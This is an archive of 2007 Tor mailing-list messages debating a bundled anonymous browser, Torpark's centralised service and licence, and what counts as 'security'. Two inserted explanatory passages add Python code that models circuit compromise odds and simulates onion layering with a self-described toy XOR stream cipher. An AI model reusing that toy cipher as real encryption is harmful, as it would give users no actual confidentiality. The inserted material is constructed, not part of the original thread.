> Here is some really great idea. How about some function in Tor into
> which users can enter their .onion bookmarks along with a description!
> 99.9% of the Tor users have no idea that there are hidden services. No
> Tor user I ever met knew about the hidden wiki and all its links.

You can do this with Torpark right now. You can reach .onion addresses
right from the address bar. If people would like to compile a list of
services, I could publish that list as browser bookmarks in the next
release of Torpark.

Regards,
Steve



Re: Ultimate solution

2007-03-27 Thread JT
Hi,

> > Let the users surf the tor net instead of the www
> 
> Thats just plain stupid. Should Tor become just another Freenet clone? I
> don't think so.
> 
> The whole point of Tor is that you can surf "normal web"  and not just
> another Tor-users websites.

That is not stupid! Tor has this great capability. Let users make the
most of it.
Tor is providing what the WWW is lacking: end-to-end encryption. Of
course it was meant to surf the www anonymously.
But ever heard about evolution?
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - A no graphics, no pop-ups email service



Re: Ultimate solution

2007-03-26 Thread M
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


> Let the users surf the tor net instead of the www

Thats just plain stupid. Should Tor become just another Freenet clone? I
don't think so.

The whole point of Tor is that you can surf "normal web"  and not just
another Tor-users websites.

M

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3-cvs (MingW32)
Comment: GnuPT 2.7.6
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGCM6N6fSN8IKlpYoRAmyfAJ9rfPom7M6c8dAiDbD0Dg7xHiO+/wCeKkSl
++z5TKQ5r7wnNttnHP75nXY=
=AF+g
-----END PGP SIGNATURE-----


Re: Re[2]: Ultimate solution

2007-03-26 Thread JT
To be able to create a kick arse anonymity software we have to face
reality.

Fact is:

1) there are evil exit nodes (this won't change, no matter what)
2) there are tons of noobs (this won't change, no matter what)
3) there are too few routers/exits for the clients (this bad ratio won't
change no matter how fast the network grows)
4) even if the people will change the habits of not sending sensitive
message through not encrypting exit nodes there will be new tor users
who will

Solution

Let the users surf the tor net instead of the www(encrypted messages ->
don't care about evil exits as they can not inject anything bad) as much
as possible.
To keep tor users on the tor net there must be a huge number of
websites. A huge number of websites can only be achieved by having an
integrated secure and preconfigured web server. Grandma will never learn
how to set up a webserver but she knows how to use a WYSIWYG editor to
create html pages to tell people about her life under dictatorship for
example.

How can the ratio of router/clients be improved? Every client must
become a router. There is no other way. There must be a simple button
"Yes, I want to be  an exit." or "No, I don't want to be an exit". I
know this will take many, many hours of coding and I am not criticizing
but wishful thinking won't get this great project anywhere. Yes, there
are many nice people that run servers but the network will soon suffer a
heart attack as the number of clients grows much faster than the number
of routers.

Here is some really great idea. How about some function in Tor into
which users can enter their .onion bookmarks along with a description!
99.9% of the Tor users have no idea that there are hidden services. No
Tor user I ever met knew about the hidden wiki and all its links.

Right now the only entry point to the Tor net is the link on the tor
site. If every user could enter links of his friends or sites that he
knows about into his tor client(which is searchable by other tor
clients) then this would help make the Tor net known big time! Similar
to freenet where a start page opens. Also if the clients could keep
track of when a tor site was last reachable then that would rock!
Similar to emule where the software knows when a file was last seen
complete. No need to have link section on .onion sites and update the
links.
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - Or how I learned to stop worrying and
  love email again



Re: Ultimate solution

2007-03-26 Thread JT
You are making a very big mistake! In theory you are correct with what
you are saying but you are assuming the total noob can learn how to safe
anonymously but also give grandma a chance to surf anonymously. Grandma
knows what a browser is but has never heard about encryption or TCP/IP.


On Sat, 24 Mar 2007 00:50:15 -0400, "Freemor" <[EMAIL PROTECTED]> said:
>   I've been watching this thread with some interest and just wanted to
> add my view to the discussion. I think there is a real danger in making
> TOR too easy. Yes, I do understand that Microsoft and others have
> created a world of people that want every program to function completely
> with 3 clicks. For some applications this is a laudable goal. 
> 
>   However, when one is dealing with a program that deals with security
> or anonymity I think it is important that people who intend to use the
> program take the time and effort to learn. They need to learn what it
> does, what it doesn't do, how it does it, how it is circumvented, how to
> check if it is working correctly, etc. One of the major reasons there is
> so much tracking of personal data on the web is most users lack of
> responsibility for their own privacy and security.
> 
>   For these reasons, my concern is that making TOR a 3 click wonder will
> not only further propagate this "some one else will worry about my
> privacy/security for me" thinking and ultimately would lead people to a
> false sense of security because they won't properly understand the TOR
> network, and will blissfully find ways to make their computer leak more
> than a bucket with no bottom, all the while thinking "oh, it's fine,
> I've got TOR on, I can see the icon in the systray right there".
> 
>   I feel that rather than head down the 3 click wonder path, it would be
> better to invest time in reminding users that we are talking about their
> security, or their anonymity, that as such it is their responsibility,
> and decidedly worth the time to learn as much as possible about the
> programs or systems they use to protect it. 
> 
>   I would hate to see the day when the TOR team has to waste countless
> hours and resources to battle complaints that "TOR failed to protect me
> when I ".
> 
> Just my thoughts on the subject
> 
> Freemor
> 
> P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
> That just snuck in there as I deal with computer security regularly and
> often see the same "the computer/internet/isp/mysterious someone" should
> take care of that for me mentality.   
> 
> On Fri, 2007-23-03 at 02:44 -0700, JT wrote:
> > Hi,
> > 
> > why spend hundreds and thousands of hours of coding?
> > 
> > Is there a browser that doesn't support javascript, java, flash,
> > quicktime, etc but only pictures so one can read html text and pictures
> > and can read a normal newspaper? If there is such a browser why not
> > force Tor users to use it? Make Tor only work with that browser.
> > 
> > If Tor wants to be an anonymous communication tool it should come in an
> > entire package. If Tor wants to be successful it MUST come in a complete
> > package.
> > 90% of the users use it to surf anonymously, the rest use ftp, chat or
> > whatever.
> > 
> > How about instead of telling a user to:
> > 
> > install tor and vidalia
> > activate tor
> > install the tor button
> > install the noscript
> > install flashblock
> > configure noscript
> > deactivate flash, etc
> > install cookie culler 
> > turn off the referer header in the browser
> > etc
> > etc
> > 
> > have them just install the "package for free communication".
> > That way there is no way they can forget to turn anything off or on.
> > That way every person that uses the "Tor package for free communication"
> > can benefit from the expertise of the people that release the package.
> > All the "hacks" that are published are not against Tor but against the
> > users "communication package" that the users put together himself. Why
> > not help/force internet noobs to be safe.
> > 
> > I know it is called the Tor project but why not extend it to a real
> > communication package. Vidalia was a good start. Now one step further!!
> > 
> > Is there a free open source browser that could be shipped with the Tor
> > package that is fully configured for anonymous surfing and fine tuned to
> > be most anonymous, set so that it can be only used through Tor? It
> > should be modified so that a noob can not change the settings by
> > accident.
> > 
> > I am not a programmer but this is what must happen. If Tor is only
> > supposed to be for technical experts and people that hang out in
> > security forums every day then we should continue as is but if Tor is
> > supposed to be for the masses(more people more distributed trust) then
> > there must be a bundle. A package with everything set up for anonymous
> > browsing where some internet newbie can not possibly reveal his IP by
> > misconfiguration. The user clicks the setup program Tor installs, the
> > T

Re: Anonymity through decentralization (was Re: Ultimate solution)

2007-03-26 Thread Arrakis
Roger,

We have produced a commercial that should help explain the service we
are offering. I have no intention of holding it out as onion routing
unless we switch to onion routing, and I will elaborate on our website
as to how the network works.

Would you be interested in a video that depicts how onion routing
works? I've been toying with the idea of putting one together.

Regards,
Arrakis

> On Sun, Mar 25, 2007 at 09:57:20AM -0600, Arrakis wrote:
>> 2) Torpark is not commercial, it is totally free and open source. We
>> simply offer an upgrade to get higher speeds than the tor network can
>> provide.
>> 
>> 3)  The  fact  that  trust  isn't  distributed  is  a  positive, not a
>> negative,  because you don't have to trust everyone with your outgoing
>> plaintext traffic. We have independent security auditors make sure our
>> admins  are  not tracking anyone or doing anything malicious.

> I'm leaving the licensing discussion alone for now, but I wanted to
> respond to this technical point. Tor's security [1] comes from two
> components. The first is its large and diverse user base -- as the user
> base expands, the mere use of Tor doesn't narrow you down to a specific
> user community or specific few people who are known to have fetched the
> program [2]. The second is the diversity of the relays -- as the Tor
> network expands, fewer adversaries are able to be in enough places on
> the network to succeed at linking senders to recipients.

> Now, it's still an open research question what metrics we should use
> for these components (that is, how exactly we measure the security we
> get from them), but my intuition is that after a certain point the first
> component doesn't contribute much more to security -- meaning in Tor's
> current state, its security grows primarily as the network grows.

> And remember that by "being in enough places", I mean being in a position
> to watch (or otherwise measure [3]) the traffic; the best attacks we know
> right now only look at characteristics of the traffic flow [4], because
> any sort of coordinated compromise of many relays is probably harder.

> I'm not saying Tor's design is perfect. We are still grappling with
> Sybil attack questions, and as you say we need to encourage our users to
> employ end-to-end encryption and authentication when appropriate. And
> we're still not happy that a widely dispersed attacker can probably do
> very well against Tor.

> But a central organization that administers all the relays, even if it
> puts them in different places geographically, and even if it promises to
> do perfect audits and employ only perfect people, aims for a fundamentally
> different sort of security than Tor aims to provide. The traffic analysis
> attacks above are still just as much of a concern, but insider attacks and
> other attacks on/by the organization are now a significant question too.

> You can launch a new single-hop proxy service, commercial or not,
> proprietary or not. You can also launch a multi-hop service where you
> control every hop. And the license of the Tor software lets you use it
> if you find it useful for your purposes. But please don't deceive your
> users by changing the security context and then encouraging them to think
> that just because the Tor software is present somewhere in the picture,
> they are benefitting from the type of security that Tor aims to provide.

> --Roger

> [1] By "security", I'm talking primarily about unlinkability here;
> but that's a different thread.
> [2] http://freehaven.net/anonbib/#usability:weis2006
> [3] http://freehaven.net/anonbib/#torta05
> [4] http://freehaven.net/anonbib/#danezis:pet2004





Re: Ultimate solution

2007-03-26 Thread Paul Syverson
On Mon, Mar 26, 2007 at 02:44:53PM -0600, Arrakis wrote:
> Paul and Michael,
> 
> Correct.  Apparently  when  something  is free of charge whatever, and
> yours  to do with what you wish unless you are unethical, we call that
> "arrakis-free" or "free as in arrakis".
> 

Or hence "free as the fremen" (sorry couldn't resist).
-Paul


Anonymity through decentralization (was Re: Ultimate solution)

2007-03-26 Thread Roger Dingledine
On Sun, Mar 25, 2007 at 09:57:20AM -0600, Arrakis wrote:
> 2) Torpark is not commercial, it is totally free and open source. We
> simply offer an upgrade to get higher speeds than the tor network can
> provide.
> 
> 3)  The  fact  that  trust  isn't  distributed  is  a  positive, not a
> negative,  because you don't have to trust everyone with your outgoing
> plaintext traffic. We have independent security auditors make sure our
> admins  are  not tracking anyone or doing anything malicious.

I'm leaving the licensing discussion alone for now, but I wanted to
respond to this technical point. Tor's security [1] comes from two
components. The first is its large and diverse user base -- as the user
base expands, the mere use of Tor doesn't narrow you down to a specific
user community or specific few people who are known to have fetched the
program [2]. The second is the diversity of the relays -- as the Tor
network expands, fewer adversaries are able to be in enough places on
the network to succeed at linking senders to recipients.

Now, it's still an open research question what metrics we should use
for these components (that is, how exactly we measure the security we
get from them), but my intuition is that after a certain point the first
component doesn't contribute much more to security -- meaning in Tor's
current state, its security grows primarily as the network grows.

And remember that by "being in enough places", I mean being in a position
to watch (or otherwise measure [3]) the traffic; the best attacks we know
right now only look at characteristics of the traffic flow [4], because
any sort of coordinated compromise of many relays is probably harder.

I'm not saying Tor's design is perfect. We are still grappling with
Sybil attack questions, and as you say we need to encourage our users to
employ end-to-end encryption and authentication when appropriate. And
we're still not happy that a widely dispersed attacker can probably do
very well against Tor.

But a central organization that administers all the relays, even if it
puts them in different places geographically, and even if it promises to
do perfect audits and employ only perfect people, aims for a fundamentally
different sort of security than Tor aims to provide. The traffic analysis
attacks above are still just as much of a concern, but insider attacks and
other attacks on/by the organization are now a significant question too.

You can launch a new single-hop proxy service, commercial or not,
proprietary or not. You can also launch a multi-hop service where you
control every hop. And the license of the Tor software lets you use it
if you find it useful for your purposes. But please don't deceive your
users by changing the security context and then encouraging them to think
that just because the Tor software is present somewhere in the picture,
they are benefitting from the type of security that Tor aims to provide.

--Roger

[1] By "security", I'm talking primarily about unlinkability here;
but that's a different thread.
[2] http://freehaven.net/anonbib/#usability:weis2006
[3] http://freehaven.net/anonbib/#torta05
[4] http://freehaven.net/anonbib/#danezis:pet2004
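Roger's argument that Tor's unlinkability grows primarily with relay diversity can be put in numbers. What follows is an added illustration, not code from this thread or from Tor itself: it models a uniform choice of distinct entry and exit relays and asks how often a single adversary holds both ends of a circuit, which is the "being in enough places" position that lets the traffic-flow attacks he cites match a sender to a recipient. It deliberately ignores bandwidth weighting and entry guards, both of which Tor's real path selection uses, and it counts only relays the adversary runs, not links it merely observes; the relay counts and the hostile fraction are made-up inputs.

```python
from fractions import Fraction
import random
from typing import Dict, List


def p_both_ends(n_relays: int, n_bad: int) -> Fraction:
    """Exact probability that a circuit's entry and exit relays, chosen
    uniformly and distinct, both belong to one adversary, who can then
    match the traffic pattern entering the circuit with the one leaving it."""
    if n_relays < 2 or not 0 <= n_bad <= n_relays:
        raise ValueError("need at least two relays and 0 <= n_bad <= n_relays")
    return Fraction(n_bad * (n_bad - 1), n_relays * (n_relays - 1))


def p_any_of(n_relays: int, n_bad: int, circuits: int) -> Fraction:
    """Probability that at least one of `circuits` independently built
    circuits is held at both ends; this is what grows fast over a long
    session when every circuit picks fresh relays."""
    return 1 - (1 - p_both_ends(n_relays, n_bad)) ** circuits


def simulate(n_relays: int, n_bad: int, trials: int, seed: int = 1) -> float:
    """Monte Carlo check of p_both_ends: build 3-hop circuits from distinct
    relays (indices below n_bad are the adversary's) and count the circuits
    whose entry and exit are both hostile."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        entry, _middle, exit_ = rng.sample(range(n_relays), 3)
        if entry < n_bad and exit_ < n_bad:
            hits += 1
    return hits / trials


def growth_table(n_bad: int, sizes: List[int]) -> Dict[int, Fraction]:
    """Same adversary, growing network: the per-circuit risk for each size."""
    return {n: p_both_ends(n, n_bad) for n in sizes}


if __name__ == "__main__":
    # Constructed inputs: 20 hostile relays in networks of growing size.
    for n, p in growth_table(20, [100, 400, 1600]).items():
        print(f"{n:5d} relays, 20 hostile: one circuit {float(p):.5f}, "
              f"any of 1000 circuits {float(p_any_of(n, 20, 1000)):.3f}")
    print("simulated, 100 relays:", simulate(100, 20, 50000))
```

The numbers make the point: holding 20 of 100 relays gives the adversary roughly one circuit in 26, and a user who builds a thousand circuits is almost certain to be caught on at least one; the same 20 relays in a network of 1600 give about one circuit in 6700. That the adversary can win the ratio back by adding relays of its own is the Sybil question Roger says is still open.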



Re[2]: Ultimate solution

2007-03-26 Thread Arrakis
Paul and Michael,

Correct.  Apparently  when  something  is free of charge whatever, and
yours  to do with what you wish unless you are unethical, we call that
"arrakis-free" or "free as in arrakis".

And  to  Kasimir,  the  license  has been updated, and definitions are
forthcoming.

Regards,
Steve

> So the "Torpark" controversy comes down to:
> "Free" == "Yours to do with as you wish" versus
> "Free" == "No charge to use"?

> What are the "official" terms for these two cases?

> And, what's the terms for
> "Source code is available, but usage is restricted" versus
> "Source code is available, usage unrestricted" (same as free #1 above)




Re: Re[2]: Free Software and Torpark (was: Ultimate solution)

2007-03-26 Thread H D Moore

My employer's product has RFC1314 support for sending exploit traffic ;-) 
http://www.bpointsys.com


-HD

On Monday 26 March 2007 14:18, Michael_google gmail_Gersten wrote:
> I worry about the day that someone actually does follow that RFC,
> wreak havoc, and then in court use the defense, "I am following all
> the official standards of the communications network, and if there is
> a problem, it is with the other users who do not observe the
> standards".


Re: Re[2]: Free Software and Torpark (was: Ultimate solution)

2007-03-26 Thread Michael_google gmail_Gersten

On 3/25/07, Matt Ghali <[EMAIL PROTECTED]> wrote:

Perhaps what you are looking for is full support for RFC 3514.


Was that the "evil bit" RFC?

I worry about the day that someone actually does follow that RFC,
wreak havoc, and then in court use the defense, "I am following all
the official standards of the communications network, and if there is
a problem, it is with the other users who do not observe the
standards".


Re: Ultimate solution

2007-03-26 Thread Michael_google gmail_Gersten

So the "Torpark" controversy comes down to:
"Free" == "Yours to do with as you wish" versus
"Free" == "No charge to use"?

What are the "official" terms for these two cases?

And, what's the terms for
"Source code is available, but usage is restricted" versus
"Source code is available, usage unrestricted" (same as free #1 above)


Re: Ultimate solution

2007-03-26 Thread Freemor
On Mon, 2007-26-03 at 12:47 -0400, Paul Syverson wrote:

> 
> Yes. I understand what you mean now. But you are misusing 'secure' by
> saying something is not secure if it is not confidential. As an
> imperfect analogy, people sometimes say "home computer" when they are
> really only counting it as a computer if it's a wintel box.
> 
> -Paul

True, I realized that I probably would have avoided a lot of confusion
by choosing more specific terminology. "Secure" is a relative term like
"big" where, to use your example "confidential" describes a much more
specific condition. I shall endeavour in the future to stick to more
accurate terms. 

thanks, for bringing it up. I appreciate the input.

Take Care,
Freemor

--

Freemor <[EMAIL PROTECTED]>

This e-mail has been digitally signed with GnuPG






Re: Ultimate solution

2007-03-26 Thread Paul Syverson
On Mon, Mar 26, 2007 at 12:16:07PM -0400, Freemor wrote:
> 
> 
> I think the separation is one that exists in my mind. To my thinking TOR
> makes my communication anonymous, but does not make my communications
> secure in that everything is in the clear leaving an exit node. So, if
> I'm wanting secure and anonymous communications I'd have to connect to
> an encrypting endpoint in which case the SSH/TLS/SSL encryption is
> making my data secure while tor is making my communication anonymous.
> 
>   Clearly anonymous+encrypted = more secure than just encrypted. However
> anonymous + easily sniffable by an exit node or anything beyond =
> anonymous but not secure (encrypted). In the latter case I would need to
> be very judicious about what data I transmitted as if any of it were
> identifiable (alone or cumulatively) I will blow the anonymity that TOR
> provides. In the former case this concern is alleviated so long as I
> trust the encrypting endpoint. If I don't trust the encrypting endpoint
> I'm basically fubar'd.
> 
> That help?

Yes. I understand what you mean now. But you are misusing 'secure' by
saying something is not secure if it is not confidential. As an
imperfect analogy, people sometimes say "home computer" when they are
really only counting it as a computer if it's a wintel box.

-Paul


Re: Ultimate solution

2007-03-26 Thread Paul Syverson
On Sun, Mar 25, 2007 at 11:56:40AM -0600, Arrakis wrote:
> 
> Saying free and open-source software isn't "Free" and "Open Source" is
> giving  in to a combination of semantics and snobbery of licensing. It
> isn't  as  though  any  organization owns the definition of "Free" and
> "Open  Source"  and has the authority to pin it down to their specific
> hoops we must jump through, nor should anyone assume we have.
> 

There are (at least) two things going on through this discussion that
are run together and should be separated. 'Free' and 'open source'
have long ago become technical terms in the context of software and
programs. Technical terms allow a community to agree on some things so
that it is not necessary to spend many paragraphs explaining
terminology every time one wants to say something. This does not rob
the terms of their broader meaning.  And people can use the terms as
they wish, but if they have a discussion in a context for which the
terms have specific meaning, then they should expect to be
misunderstood and yelled at a lot for confusing people and wasting
their time. And, if they refuse to conform to the vocabulary of the
community they can expect to eventually be simply dismissed as too
much trouble to deal with. I would be subject to the same criticism if
I started talking about free algebra, free groups, free variables,
etc. using 'free' in some nonstandard way and simply insisting that it
is correct.

One can of course question the standard usage that has arisen and give
arguments why other ways of speaking are more appropriate. But that is
a topic for a forum where there is discussion about the basic meaning
of those terms, not in a context where they are simply assumed and
used, such as this one.

Arrakis can do what he wishes with his software. If he calls it free
software in a broader population, well it will be interpreted however
it will.  But, if he calls it free software in a software development
forum, he is simply misusing an established term. But, after one or
two posts, the meaning of "free" is off-topic for this forum and
should be taken to one where it is appropriate.  (People may also then
get angry that the public will be misled and run together things that
are not the same at all. This happens all the time when science hits
the broader world. It is also part of what is going on here.)

If it is important to continue a discussion of the different types
of licenses that Tor software or other related software is under, e.g.,
because it affects decisions about further development and distribution
of that software, then fights over the correct meaning of 'free' should
be taken elsewhere. We can for these purposes adopt something like
standard-free and arrakis-free for these discussions without quibbling
over which of them is really free.

-Paul 

(P.S. For more, please see my critical analysis of that moving
treatise on the impact of Frege's Begriffsschrift in the years
after the American Civil War,  _Freedom's Lament: A History of the
Bound Variable in America_. )


Re: Ultimate solution

2007-03-26 Thread Freemor

> I'm even more confused. Are you saying anonymity is not a security
> property? By "security" are you limiting yourself to confidentiality?
> There are many aspects of security, rarely all addressed at once by
> any system. One of these is anonymity, which is why one finds
> anonymity as a listed topic in the CFP of virtually every major
> computer security conference.
> 
> -Paul
> 

Yes anonymity is a type of security and an important one. TOR makes me
anonymous, it makes the data transmission secure up to the point of the
exit node, it helps to prevent traffic analysis etc. All of these are
security properties.

I think the separation is one that exists in my mind. To my thinking TOR
makes my communication anonymous, but does not make my communications
secure in that everything is in the clear leaving an exit node. So, if
I'm wanting secure and anonymous communications I'd have to connect to
an encrypting endpoint in which case the SSH/TLS/SSL encryption is
making my data secure while tor is making my communication anonymous.

  Clearly anonymous+encrypted = more secure than just encrypted. However
anonymous + easily sniffable by an exit node or anything beyond =
anonymous but not secure (encrypted). In the latter case I would need to
be very judicious about what data I transmitted as if any of it were
identifiable (alone or cumulatively) I will blow the anonymity that TOR
provides. In the former case this concern is alleviated so long as I
trust the encrypting endpoint. If I don't trust the encrypting endpoint
I'm basically fubar'd.

That help?
Freemor

--

Freemor <[EMAIL PROTECTED]>

This e-mail has been digitally signed with GnuPG





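Freemor's distinction above (Tor makes the connection anonymous, but what leaves the exit is in the clear unless the endpoint encrypts) and the "lock icon" rule of thumb he gives earlier in the thread can be watched happening in a small simulation of a three-hop circuit. This is an added example, not code from this thread or from Tor: the per-hop keys are taken as already established (Tor derives them in a handshake with each relay), a SHA-256 counter-mode keystream stands in for Tor's per-hop cipher, and a single key shared between client and site stands in for the TLS session behind the lock icon. The relay names, the bank.example host and the session cookie are made up for the demonstration.

```python
import hashlib
import os
from typing import Dict, List, Tuple


def _xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy stream cipher (SHA-256 in counter mode). It only illustrates the
    layering; it is not a substitute for a real cipher."""
    stream = bytearray()
    block = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + nonce + block.to_bytes(4, "big")).digest()
        block += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt under `key` with a fresh random nonce prepended."""
    nonce = os.urandom(8)
    return nonce + _xor_stream(key, nonce, plaintext)


def unseal(key: bytes, blob: bytes) -> bytes:
    return _xor_stream(key, blob[:8], blob[8:])


def wrap_hop(key: bytes, next_hop: str, inner: bytes) -> bytes:
    """One onion layer: the hop's key protects 'who comes next' and the rest."""
    name = next_hop.encode()
    return seal(key, bytes([len(name)]) + name + inner)


def unwrap_hop(key: bytes, blob: bytes) -> Tuple[str, bytes]:
    plain = unseal(key, blob)
    n = plain[0]
    return plain[1:1 + n].decode(), plain[1 + n:]


def build_onion(path: List[Tuple[str, bytes]], destination: str, payload: bytes) -> bytes:
    """Layer the payload once per relay in `path` (guard first, exit last)."""
    next_name, blob = destination, payload
    for relay_name, key in reversed(path):
        blob = wrap_hop(key, next_name, blob)
        next_name = relay_name
    return blob


def run_circuit(client: str, path, destination: str, payload: bytes) -> Dict[str, dict]:
    """Pass the onion through the circuit and record what each relay learns:
    who handed it the cell, where to send it next, and the bytes it forwards."""
    views = {}
    blob = build_onion(path, destination, payload)
    prev = client
    for relay_name, key in path:
        next_hop, blob = unwrap_hop(key, blob)
        views[relay_name] = {"from": prev, "to": next_hop, "forwards": blob}
        prev = relay_name
    return views


# Constructed sample: a plaintext HTTP request carrying a session cookie.
HTTP_REQUEST = (b"GET /account HTTP/1.1\r\nHost: bank.example\r\n"
                b"Cookie: session=alice-1234\r\n\r\n")
SECRET = b"session=alice-1234"


def demo() -> Dict[str, bool]:
    path = [("guard", os.urandom(32)), ("middle", os.urandom(32)), ("exit", os.urandom(32))]
    # Case 1: no end-to-end encryption; what leaves the exit is the request itself.
    http = run_circuit("client", path, "bank.example:80", HTTP_REQUEST)
    # Case 2: the request is sealed first under a key only client and site share
    # (standing in for the TLS session the browser shows as a lock icon).
    e2e_key = os.urandom(32)
    tls = run_circuit("client", path, "bank.example:443", seal(e2e_key, HTTP_REQUEST))
    return {
        "guard_sees_client": http["guard"]["from"] == "client",
        "guard_sees_destination": "bank.example" in http["guard"]["to"],
        "middle_sees_either": http["middle"]["from"] == "client"
                              or "bank.example" in http["middle"]["to"],
        "exit_sees_client": http["exit"]["from"] == "client",
        "exit_sees_destination": "bank.example" in http["exit"]["to"],
        "exit_reads_cookie_http": SECRET in http["exit"]["forwards"],
        "exit_reads_cookie_tls": SECRET in tls["exit"]["forwards"],
        "site_reads_cookie_tls": unseal(e2e_key, tls["exit"]["forwards"]) == HTTP_REQUEST,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:24s} {value}")
```

Run it and the two halves of Freemor's point fall out of the relay views: the exit never learns who the client is, but in the plain-HTTP case it forwards the cookie verbatim and can read or alter it; with the request sealed under the client-site key the same relay forwards only ciphertext, and only the site can recover the request. The anonymity property is identical in both runs; only the confidentiality differs, which is exactly what the lock icon signals.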

Re: Ultimate solution

2007-03-26 Thread Paul Syverson
On Sat, Mar 24, 2007 at 11:34:47AM -0400, Freemor wrote:
> On Sat, 2007-24-03 at 08:52 -0400, Paul Syverson wrote:
> > On Sat, Mar 24, 2007 at 12:50:15AM -0400, Freemor wrote:
> > > 
> > > P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
> > > That just snuck in there as I deal with computer security regularly and
> > > often see the same "the computer/internet/isp/mysterious someone" should
> > > take care of that for me mentality.   
> > > 
> > 
> > I don't understand this statement. Tor was reasearched and developed
> > by and for the US DoD as an onion routing project, the explicit purpose
> > of which is security for DoD and other communications:
> > traffic analysis resistance, DoS resistance, personnel protection,
> > etc.
> > 
> > -Paul
> 
> I can see your point and TOR does have some security applications if
> used properly and with those goals in mind (i.e. only connecting to
> https or other encrypted endpoints). The main goal of TOR is clearly
> anonymity. If the main goal was security having data leave the exit
> nodes in the clear would be a definite no no. I was also just being
> clear that I did not think of TOR as a
> firewall/antivirus/anti-malware/etc system when I used the term
> Security. 
> 

I'm even more confused. Are you saying anonymity is not a security
property? By "security" are you limiting yourself to confidentiality?
There are many aspects of security, rarely all addressed at once by
any system. One of these is anonymity, which is why one finds
anonymity as a listed topic in the CFP of virtually every major
computer security conference.

-Paul



Re: Free Software and Torpark (was: Ultimate solution)

2007-03-25 Thread Brad Freeman


On 25 mar 2007, at 22.48, H D Moore wrote:

> This is a stupid argument to start with -- ignoring the license, TorPark
> should be recommended based on the quality of the code and the features
> of the software. If TorPark LLC does something evil at a later date, stop
> recommending them.
>
> -HD


Amen, Preach it Brother HD!

Brad


Re: Ultimate solution

2007-03-25 Thread Brad Freeman


On 25 mar 2007, at 21.16, Michael_google gmail_Gersten wrote:


> The whole "Because some aspect of Flash can kill you, all of flash
> must be junked" approach won't work. That's like saying, "Because Java
> could contain an unsafe program, no Java can be used".

Or like saying "Because SOME people are using Tor for bad things, we
need to get rid of Tor."


Brad


Re[2]: Free Software and Torpark (was: Ultimate solution)

2007-03-25 Thread Matt Ghali

Perhaps what you are looking for is full support for RFC 3514.

Best of luck.

matto


On Sun, 25 Mar 2007, Arrakis wrote:


> Let us not be ambiguous about the "users" you are talking about. The
> specific "users" you are talking about are limited by definition to
> only be the ones wanting to modify it to include malware/trojans, or
> someone trying to turn it into a commercial application, or an evil
> government that does not abide by the universal declaration of human
> rights. Anyone who falls under one of those three definitions who
> can't consider it free, I'm not concerned about. To _all_ other users,
> it is free and open source, and they can do what they want with it,
> and modify and distribute it how they please.



[EMAIL PROTECTED]
  Moral indignation is a technique to endow the idiot with dignity.
- Marshall McLuhan


Re[2]: Free Software and Torpark (was: Ultimate solution)

2007-03-25 Thread Arrakis
I'll address these issues since you didn't feel it was
necessary to read the followups on the thread you posted:

1) tor devs are not qualified to review the code. Shava Nerad of the
Tor project asked me to refer someone to do QA on 3rd party win32 apps
for the Tor project, which I did. Will it ever happen? Who knows.

2) Those are not issues with Torpark but the windows operating system.
However, in a future release of Torpark we are working on even the
faults of the win os will be addressed. Those issues are 1) the way
windows treats memory, and 2) the way windows treats applications and
may cache them. Since then I have removed the section about it not
leaving traces, because it simply does as that is the nature of
windows.

3) I have a step by step for building Torpark. Further, if you bother
to read the code, you will see it is well documented.

Regards,
Steve


> TorPark is not recommended by any Tor devs or others
> working with/on Tor.

> TorPark has some unresolved issues:
> .

> And it is not documented well.

> Regards,







Re: Free Software and Torpark (was: Ultimate solution)

2007-03-25 Thread light zoo

--- H D Moore <[EMAIL PROTECTED]> wrote:

> On Sunday 25 March 2007 14:06, Fabian Keil wrote:
> > ...TorPark should be recommended based on the
> quality of the code and the features of the
> software. If TorPark LLC does something evil
> at a later date, stop recommending them.
> 
> -HD

TorPark is not recommended by any Tor devs or others
working with/on Tor.

TorPark has some unresolved issues:
.

And it is not documented well.

Regards,





Re: Free Software and Torpark (was: Ultimate solution)

2007-03-25 Thread Philippe Gauthier
> Once  again,  would  anyone else like to see Tor's license add that it
> can't  be  modified  to  have malware, trojans, spyware, etc. injected
> into it?

-1




Re[4]: Free Software and Torpark (was: Ultimate solution)

2007-03-25 Thread Arrakis
Kasimir,

You are right, I think that is too broad and I will ask that the
license give more precise definitions. It was to include
anonymity/proxy services, I'll make sure it gets revised.

Regards,
Arrakis

> It would be good if I could read, I am sorry for posting that I saw
> the license as free.  Reading through it fully, it definitely is not.

> The terms of the license are way too broad.  Trying to exclude malware
> and spyware by licensing the program under a license which states that
> it cannot be used for anything that restricts the rights of the user
> will not work.  First of all, malware does not restrict the rights of
> the user.  Second of all, malware doesn't care about licenses, and the
> creators of much of the spyware and malware are not known to the
> world, so even if they break this license nothing will happen to them.

> Another thing that doesn't really make sense to me about the license
> is that it restricts the right to modify the program if it uses a
> commercial "connectivity service".  I am not a lawyer, but isn't my
> ISP a commercial "connectivity service"?  It seems to me that this
> program cannot be redistributed at all, because it can only be used
> with a commercial "connectivity service", and therefore any
> modification will break the license.

> I take back what I said earlier, and I am sorry for causing so many
> people to stare at their monitor in disbelief from what they just
> read.

> My most humble apologies,
> Kasimir

> On 3/25/07, Arrakis <[EMAIL PROTECTED]> wrote:
>> Fabian et al,
>>
>> > The terms "free software" and "open source software" have been
>> > around for a while and so has their meaning. No one said Torpark
>> > wasn't delivered free of charge or that its source wasn't open for
>> > review.
>>
>> > Torpark's license just doesn't give the user enough rights to
>> > call Torpark either free software or open source software
>> > without causing confusion, raised eyebrows or being laughed at.
>>
>> Let  us  not be ambiguous about the "users" you are talking about. The
>> specific  "users"  you  are talking about are limited by definition to
>> only  be  the ones wanting to modify it to include malware/trojans, or
>> someone  trying  to  turn it into a commercial application, or an evil
>> government  that  does not abide by the universal declaration of human
